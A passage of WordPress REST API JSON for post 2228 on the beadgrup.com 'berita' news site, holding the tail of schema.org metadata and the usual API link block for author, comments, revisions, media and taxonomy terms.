Daily"},"image":{"@id":"https:\/\/beadgrup.com\/berita\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"","url":"https:\/\/beadgrup.com\/berita\/author\/"}]}},"_links":{"self":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts\/2228","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/comments?post=2228"}],"version-history":[{"count":1,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts\/2228\/revisions"}],"predecessor-version":[{"id":2233,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/posts\/2228\/revisions\/2233"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/media\/2232"}],"wp:attachment":[{"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/media?parent=2228"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/categories?post=2228"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/beadgrup.com\/berita\/wp-json\/wp\/v2\/tags?post=2228"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}